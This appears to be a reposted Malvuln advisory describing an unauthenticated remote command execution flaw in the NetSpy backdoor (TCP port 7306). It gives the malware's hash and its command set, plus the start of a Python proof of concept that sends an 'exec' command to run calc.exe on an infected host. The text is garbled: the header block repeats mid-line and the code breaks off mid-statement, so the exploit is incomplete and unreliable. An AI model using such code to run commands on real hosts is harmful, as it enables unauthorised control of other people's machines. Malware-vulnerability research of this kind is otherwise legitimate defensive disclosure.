Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/45d413b46f1d14a45e8fd36921813d62.txt
Contact: malvuln13@gmail.com
Media: twitter.co Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/45d413b46f1d14a45e8fd36921813d62.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Backdoor.Win32.NetSpy.10
Vulnerability: Unauthenticated Remote Command Execution
Description: The malware listens on TCP port 7306. Attackers who can reach infected hosts can run commands made available by the backdoor. Sending commands using Ncat and Telnet both fail with errors, probably don't like the linefeed chars, so need to write your own custom client. Example commands avail are put, mkd, exec and msg.
Family: NetSpy
Type: PE32
MD5: 45d413b46f1d14a45e8fd36921813d62
Vuln ID: MVID-2022-0551
Disclosure: 04/14/2022
Exploit/PoC:
from socket import *
import time
MALWARE_HOST="x.x.x.x"
PORT=7306
CMD="exec c:\Windows\system32\calc.exe"
def chk_res(s):
res=""
while True:
res += s.recv(512)
break
if "
Backdoor.Win32.NetSpy.10 Remote Command Execution
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 141